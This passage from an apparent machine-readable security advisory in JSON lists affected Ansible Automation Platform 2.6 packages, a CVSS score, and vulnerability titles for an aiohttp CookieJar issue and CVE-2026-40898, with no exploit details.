"9Base-Ansible-Automation-Platform-2.6:automation-controller-0:4.7.15-2.el9ap.src",
"9Base-Ansible-Automation-Platform-2.6:automation-controller-0:4.7.15-2.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.6:automation-controller-cli-0:4.7.15-2.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:automation-controller-server-0:4.7.15-2.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:automation-controller-ui-0:4.7.15-2.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:automation-controller-venv-tower-0:4.7.15-2.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.6:automation-controller-venv-tower-0:4.7.15-2.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.6:automation-controller-venv-tower-0:4.7.15-2.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.6:automation-controller-venv-tower-0:4.7.15-2.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.6:automation-eda-controller-0:1.2.11-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:automation-eda-controller-0:1.2.11-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.6:automation-eda-controller-base-0:1.2.11-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:automation-eda-controller-base-services-0:1.2.11-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:automation-eda-controller-event-stream-services-0:1.2.11-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:automation-eda-controller-worker-services-0:1.2.11-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:automation-gateway-0:2.6.20260804-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:automation-gateway-0:2.6.20260804-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.6:automation-gateway-config-0:2.6.20260804-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:automation-gateway-proxy-0:2.6.17-2.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.6:automation-gateway-proxy-0:2.6.17-2.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.6:automation-gateway-proxy-0:2.6.17-2.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.6:automation-gateway-proxy-0:2.6.17-2.el9ap.src",
"9Base-Ansible-Automation-Platform-2.6:automation-gateway-proxy-0:2.6.17-2.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.6:automation-gateway-proxy-debugsource-0:2.6.17-2.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.6:automation-gateway-proxy-debugsource-0:2.6.17-2.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.6:automation-gateway-proxy-debugsource-0:2.6.17-2.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.6:automation-gateway-proxy-debugsource-0:2.6.17-2.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.6:automation-gateway-proxy-server-0:2.6.17-2.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.6:automation-gateway-proxy-server-0:2.6.17-2.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.6:automation-gateway-proxy-server-0:2.6.17-2.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.6:automation-gateway-proxy-server-0:2.6.17-2.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.6:automation-gateway-proxy-server-debuginfo-0:2.6.17-2.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.6:automation-gateway-proxy-server-debuginfo-0:2.6.17-2.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.6:automation-gateway-proxy-server-debuginfo-0:2.6.17-2.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.6:automation-gateway-proxy-server-debuginfo-0:2.6.17-2.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.6:automation-gateway-server-0:2.6.20260804-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:automation-hub-0:4.11.12-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:automation-hub-0:4.11.12-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.6:automation-platform-ui-0:2.6.12-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:automation-platform-ui-0:2.6.12-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.6:python3.12-aiohttp-0:3.14.1-2.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.6:python3.12-aiohttp-0:3.14.1-2.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.6:python3.12-aiohttp-0:3.14.1-2.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.6:python3.12-aiohttp-0:3.14.1-2.el9ap.src",
"9Base-Ansible-Automation-Platform-2.6:python3.12-aiohttp-0:3.14.1-2.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.6:python3.12-aiohttp-debuginfo-0:3.14.1-2.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.6:python3.12-aiohttp-debuginfo-0:3.14.1-2.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.6:python3.12-aiohttp-debuginfo-0:3.14.1-2.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.6:python3.12-aiohttp-debuginfo-0:3.14.1-2.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.6:python3.12-aiohttp-debugsource-0:3.14.1-2.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.6:python3.12-aiohttp-debugsource-0:3.14.1-2.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.6:python3.12-aiohttp-debugsource-0:3.14.1-2.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.6:python3.12-aiohttp-debugsource-0:3.14.1-2.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.6:python3.12-daphne-0:4.2.2-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:python3.12-daphne-0:4.2.2-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.6:python3.12-django-ansible-base+activitystream-0:2.6.20260804-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:python3.12-django-ansible-base+api_documentation-0:2.6.20260804-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:python3.12-django-ansible-base+authentication-0:2.6.20260804-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:python3.12-django-ansible-base+channel_auth-0:2.6.20260804-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:python3.12-django-ansible-base+feature_flags-0:2.6.20260804-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:python3.12-django-ansible-base+jwt_consumer-0:2.6.20260804-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:python3.12-django-ansible-base+oauth2_provider-0:2.6.20260804-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:python3.12-django-ansible-base+rbac-0:2.6.20260804-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:python3.12-django-ansible-base+redis_client-0:2.6.20260804-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:python3.12-django-ansible-base+resource_registry-0:2.6.20260804-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:python3.12-django-ansible-base+rest_filters-0:2.6.20260804-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:python3.12-django-ansible-base-0:2.6.20260804-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:python3.12-django-ansible-base-0:2.6.20260804-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.6:python3.12-galaxy-ng-0:4.11.12-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:python3.12-galaxy-ng-0:4.11.12-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.6:python3.12-pillow-0:12.3.0-1.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.6:python3.12-pillow-0:12.3.0-1.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.6:python3.12-pillow-0:12.3.0-1.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.6:python3.12-pillow-0:12.3.0-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.6:python3.12-pillow-0:12.3.0-1.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.6:python3.12-pillow-debuginfo-0:12.3.0-1.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.6:python3.12-pillow-debuginfo-0:12.3.0-1.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.6:python3.12-pillow-debuginfo-0:12.3.0-1.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.6:python3.12-pillow-debuginfo-0:12.3.0-1.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.6:python3.12-pillow-debugsource-0:12.3.0-1.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.6:python3.12-pillow-debugsource-0:12.3.0-1.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.6:python3.12-pillow-debugsource-0:12.3.0-1.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.6:python3.12-pillow-debugsource-0:12.3.0-1.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.6:python3.12-pulpcore-0:3.49.66-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:python3.12-pulpcore-0:3.49.66-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.6:python3.12-pyasn1-0:0.6.4-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:python3.12-pyasn1-0:0.6.4-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.6:python3.12-tox-ansible-0:26.7.1-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:python3.12-tox-ansible-0:26.7.1-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.6:receptor-0:1.6.7-1.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.6:receptor-0:1.6.7-1.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.6:receptor-0:1.6.7-1.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.6:receptor-0:1.6.7-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.6:receptor-0:1.6.7-1.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.6:receptor-debuginfo-0:1.6.7-1.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.6:receptor-debuginfo-0:1.6.7-1.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.6:receptor-debuginfo-0:1.6.7-1.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.6:receptor-debuginfo-0:1.6.7-1.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.6:receptor-debugsource-0:1.6.7-1.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.6:receptor-debugsource-0:1.6.7-1.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.6:receptor-debugsource-0:1.6.7-1.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.6:receptor-debugsource-0:1.6.7-1.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.6:receptorctl-0:1.6.7-1.el9ap.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"attackComplexity": "HIGH",
"attackVector": "LOCAL",
"availabilityImpact": "HIGH",
"baseScore": 7.2,
"baseSeverity": "HIGH",
"confidentialityImpact": "HIGH",
"integrityImpact": "HIGH",
"privilegesRequired": "HIGH",
"scope": "CHANGED",
"userInteraction": "REQUIRED",
"vectorString": "CVSS:3.1/AV:L/AC:H/PR:H/UI:R/S:C/C:H/I:H/A:H",
"version": "3.1"
},
"products": [
"10Base-Ansible-Automation-Platform-2.6-Developer-1.3:ansible-dev-tools+server-0:26.7.2-1.el10ap.noarch",
"10Base-Ansible-Automation-Platform-2.6-Developer-1.3:ansible-dev-tools-0:26.7.2-1.el10ap.noarch",
"10Base-Ansible-Automation-Platform-2.6-Developer-1.3:ansible-dev-tools-0:26.7.2-1.el10ap.src",
"10Base-Ansible-Automation-Platform-2.6-Developer-1.3:python-tox-ansible-0:26.7.1-1.el10ap.src",
"10Base-Ansible-Automation-Platform-2.6-Developer-1.3:python3-tox-ansible-0:26.7.1-1.el10ap.noarch",
"10Base-Ansible-Automation-Platform-2.6:ansible-dev-tools+server-0:26.7.2-1.el10ap.noarch",
"10Base-Ansible-Automation-Platform-2.6:ansible-dev-tools-0:26.7.2-1.el10ap.noarch",
"10Base-Ansible-Automation-Platform-2.6:ansible-dev-tools-0:26.7.2-1.el10ap.src",
"10Base-Ansible-Automation-Platform-2.6:python-tox-ansible-0:26.7.1-1.el10ap.src",
"10Base-Ansible-Automation-Platform-2.6:python3-tox-ansible-0:26.7.1-1.el10ap.noarch",
"10Base-Ansible-Automation-Platform-2.6:receptor-0:1.6.7-1.el10ap.aarch64",
"10Base-Ansible-Automation-Platform-2.6:receptor-0:1.6.7-1.el10ap.ppc64le",
"10Base-Ansible-Automation-Platform-2.6:receptor-0:1.6.7-1.el10ap.s390x",
"10Base-Ansible-Automation-Platform-2.6:receptor-0:1.6.7-1.el10ap.src",
"10Base-Ansible-Automation-Platform-2.6:receptor-0:1.6.7-1.el10ap.x86_64",
"10Base-Ansible-Automation-Platform-2.6:receptor-debuginfo-0:1.6.7-1.el10ap.aarch64",
"10Base-Ansible-Automation-Platform-2.6:receptor-debuginfo-0:1.6.7-1.el10ap.ppc64le",
"10Base-Ansible-Automation-Platform-2.6:receptor-debuginfo-0:1.6.7-1.el10ap.s390x",
"10Base-Ansible-Automation-Platform-2.6:receptor-debuginfo-0:1.6.7-1.el10ap.x86_64",
"10Base-Ansible-Automation-Platform-2.6:receptor-debugsource-0:1.6.7-1.el10ap.aarch64",
"10Base-Ansible-Automation-Platform-2.6:receptor-debugsource-0:1.6.7-1.el10ap.ppc64le",
"10Base-Ansible-Automation-Platform-2.6:receptor-debugsource-0:1.6.7-1.el10ap.s390x",
"10Base-Ansible-Automation-Platform-2.6:receptor-debugsource-0:1.6.7-1.el10ap.x86_64",
"10Base-Ansible-Automation-Platform-2.6:receptorctl-0:1.6.7-1.el10ap.noarch",
"9Base-Ansible-Automation-Platform-2.6-Developer-1.3:ansible-dev-tools+server-0:26.7.2-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6-Developer-1.3:ansible-dev-tools-0:26.7.2-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6-Developer-1.3:ansible-dev-tools-0:26.7.2-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.6-Developer-1.3:automation-controller-0:4.7.15-2.el9ap.src",
"9Base-Ansible-Automation-Platform-2.6-Developer-1.3:automation-controller-cli-0:4.7.15-2.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6-Developer-1.3:python3.12-tox-ansible-0:26.7.1-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6-Developer-1.3:python3.12-tox-ansible-0:26.7.1-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.6-Developer-1.3:receptor-0:1.6.7-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.6-Developer-1.3:receptorctl-0:1.6.7-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6-Inside-1.4:receptor-0:1.6.7-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.6-Inside-1.4:receptorctl-0:1.6.7-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:aap-metrics-utility-0:0.7.6-3.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.6:aap-metrics-utility-0:0.7.6-3.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.6:aap-metrics-utility-0:0.7.6-3.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.6:aap-metrics-utility-0:0.7.6-3.el9ap.src",
"9Base-Ansible-Automation-Platform-2.6:aap-metrics-utility-0:0.7.6-3.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.6:ansible-dev-tools+server-0:26.7.2-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:ansible-dev-tools-0:26.7.2-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:ansible-dev-tools-0:26.7.2-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.6:automation-controller-0:4.7.15-2.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.6:automation-controller-0:4.7.15-2.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.6:automation-controller-0:4.7.15-2.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.6:automation-controller-0:4.7.15-2.el9ap.src",
"9Base-Ansible-Automation-Platform-2.6:automation-controller-0:4.7.15-2.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.6:automation-controller-cli-0:4.7.15-2.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:automation-controller-server-0:4.7.15-2.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:automation-controller-ui-0:4.7.15-2.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:automation-controller-venv-tower-0:4.7.15-2.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.6:automation-controller-venv-tower-0:4.7.15-2.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.6:automation-controller-venv-tower-0:4.7.15-2.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.6:automation-controller-venv-tower-0:4.7.15-2.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.6:automation-eda-controller-0:1.2.11-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:automation-eda-controller-0:1.2.11-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.6:automation-eda-controller-base-0:1.2.11-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:automation-eda-controller-base-services-0:1.2.11-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:automation-eda-controller-event-stream-services-0:1.2.11-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:automation-eda-controller-worker-services-0:1.2.11-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:automation-gateway-0:2.6.20260804-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:automation-gateway-0:2.6.20260804-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.6:automation-gateway-config-0:2.6.20260804-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:automation-gateway-proxy-0:2.6.17-2.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.6:automation-gateway-proxy-0:2.6.17-2.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.6:automation-gateway-proxy-0:2.6.17-2.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.6:automation-gateway-proxy-0:2.6.17-2.el9ap.src",
"9Base-Ansible-Automation-Platform-2.6:automation-gateway-proxy-0:2.6.17-2.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.6:automation-gateway-proxy-debugsource-0:2.6.17-2.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.6:automation-gateway-proxy-debugsource-0:2.6.17-2.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.6:automation-gateway-proxy-debugsource-0:2.6.17-2.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.6:automation-gateway-proxy-debugsource-0:2.6.17-2.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.6:automation-gateway-proxy-server-0:2.6.17-2.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.6:automation-gateway-proxy-server-0:2.6.17-2.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.6:automation-gateway-proxy-server-0:2.6.17-2.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.6:automation-gateway-proxy-server-0:2.6.17-2.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.6:automation-gateway-proxy-server-debuginfo-0:2.6.17-2.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.6:automation-gateway-proxy-server-debuginfo-0:2.6.17-2.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.6:automation-gateway-proxy-server-debuginfo-0:2.6.17-2.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.6:automation-gateway-proxy-server-debuginfo-0:2.6.17-2.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.6:automation-gateway-server-0:2.6.20260804-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:automation-hub-0:4.11.12-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:automation-hub-0:4.11.12-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.6:automation-platform-ui-0:2.6.12-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:automation-platform-ui-0:2.6.12-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.6:python3.12-aiohttp-0:3.14.1-2.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.6:python3.12-aiohttp-0:3.14.1-2.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.6:python3.12-aiohttp-0:3.14.1-2.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.6:python3.12-aiohttp-0:3.14.1-2.el9ap.src",
"9Base-Ansible-Automation-Platform-2.6:python3.12-aiohttp-0:3.14.1-2.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.6:python3.12-aiohttp-debuginfo-0:3.14.1-2.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.6:python3.12-aiohttp-debuginfo-0:3.14.1-2.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.6:python3.12-aiohttp-debuginfo-0:3.14.1-2.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.6:python3.12-aiohttp-debuginfo-0:3.14.1-2.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.6:python3.12-aiohttp-debugsource-0:3.14.1-2.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.6:python3.12-aiohttp-debugsource-0:3.14.1-2.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.6:python3.12-aiohttp-debugsource-0:3.14.1-2.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.6:python3.12-aiohttp-debugsource-0:3.14.1-2.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.6:python3.12-daphne-0:4.2.2-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:python3.12-daphne-0:4.2.2-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.6:python3.12-django-ansible-base+activitystream-0:2.6.20260804-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:python3.12-django-ansible-base+api_documentation-0:2.6.20260804-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:python3.12-django-ansible-base+authentication-0:2.6.20260804-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:python3.12-django-ansible-base+channel_auth-0:2.6.20260804-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:python3.12-django-ansible-base+feature_flags-0:2.6.20260804-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:python3.12-django-ansible-base+jwt_consumer-0:2.6.20260804-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:python3.12-django-ansible-base+oauth2_provider-0:2.6.20260804-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:python3.12-django-ansible-base+rbac-0:2.6.20260804-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:python3.12-django-ansible-base+redis_client-0:2.6.20260804-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:python3.12-django-ansible-base+resource_registry-0:2.6.20260804-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:python3.12-django-ansible-base+rest_filters-0:2.6.20260804-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:python3.12-django-ansible-base-0:2.6.20260804-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:python3.12-django-ansible-base-0:2.6.20260804-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.6:python3.12-galaxy-ng-0:4.11.12-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:python3.12-galaxy-ng-0:4.11.12-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.6:python3.12-pillow-0:12.3.0-1.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.6:python3.12-pillow-0:12.3.0-1.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.6:python3.12-pillow-0:12.3.0-1.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.6:python3.12-pillow-0:12.3.0-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.6:python3.12-pillow-0:12.3.0-1.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.6:python3.12-pillow-debuginfo-0:12.3.0-1.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.6:python3.12-pillow-debuginfo-0:12.3.0-1.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.6:python3.12-pillow-debuginfo-0:12.3.0-1.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.6:python3.12-pillow-debuginfo-0:12.3.0-1.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.6:python3.12-pillow-debugsource-0:12.3.0-1.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.6:python3.12-pillow-debugsource-0:12.3.0-1.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.6:python3.12-pillow-debugsource-0:12.3.0-1.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.6:python3.12-pillow-debugsource-0:12.3.0-1.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.6:python3.12-pulpcore-0:3.49.66-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:python3.12-pulpcore-0:3.49.66-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.6:python3.12-pyasn1-0:0.6.4-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:python3.12-pyasn1-0:0.6.4-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.6:python3.12-tox-ansible-0:26.7.1-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:python3.12-tox-ansible-0:26.7.1-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.6:receptor-0:1.6.7-1.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.6:receptor-0:1.6.7-1.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.6:receptor-0:1.6.7-1.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.6:receptor-0:1.6.7-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.6:receptor-0:1.6.7-1.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.6:receptor-debuginfo-0:1.6.7-1.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.6:receptor-debuginfo-0:1.6.7-1.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.6:receptor-debuginfo-0:1.6.7-1.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.6:receptor-debuginfo-0:1.6.7-1.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.6:receptor-debugsource-0:1.6.7-1.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.6:receptor-debugsource-0:1.6.7-1.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.6:receptor-debugsource-0:1.6.7-1.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.6:receptor-debugsource-0:1.6.7-1.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.6:receptorctl-0:1.6.7-1.el9ap.noarch"
]
}
],
"threats": [
{
"category": "impact",
"details": "Important"
}
],
"title": "aiohttp: AIOHTTP: Arbitrary code execution via untrusted input to CookieJar.load()"
},
{
"cve": "CVE-2026-40898",
"cwe": {
"id": "CWE-770",
"name": "Allocation of Resources Without Limits or Throttling"
},
"discovery_date": "2026-06-04T19:00:56.584166+00:00",
"flags": [
{
"label": "vulnerable_code_not_present",
"product_ids": [
"10Base-Ansible-Automation-Platform-2.6-Developer-1.3:ansible-dev-tools+server-0:26.7.2-1.el10ap.noarch",
"10Base-Ansible-Automation-Platform-2.6-Developer-1.3:ansible-dev-tools-0:26.7.2-1.el10ap.noarch",
"10Base-Ansible-Automation-Platform-2.6-Developer-1.3:ansible-dev-tools-0:26.7.2-1.el10ap.src",
"10Base-Ansible-Automation-Platform-2.6-Developer-1.3:python-tox-ansible-0:26.7.1-1.el10ap.src",
"10Base-Ansible-Automation-Platform-2.6-Developer-1.3:python3-tox-ansible-0:26.7.1-1.el10ap.noarch",
"10Base-Ansible-Automation-Platform-2.6:ansible-dev-tools+server-0:26.7.2-1.el10ap.noarch",
"10Base-Ansible-Automation-Platform-2.6:ansible-dev-tools-0:26.7.2-1.el10ap.noarch",
"10Base-Ansible-Automation-Platform-2.6:ansible-dev-tools-0:26.7.2-1.el10ap.src",
"10Base-Ansible-Automation-Platform-2.6:python-tox-ansible-0:26.7.1-1.el10ap.src",
"10Base-Ansible-Automation-Platform-2.6:python3-tox-ansible-0:26.7.1-1.el10ap.noarch",
"9Base-Ansible-Automation-Platform-2.6-Developer-1.3:ansible-dev-tools+server-0:26.7.2-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6-Developer-1.3:ansible-dev-tools-0:26.7.2-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6-Developer-1.3:ansible-dev-tools-0:26.7.2-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.6-Developer-1.3:automation-controller-0:4.7.15-2.el9ap.src",
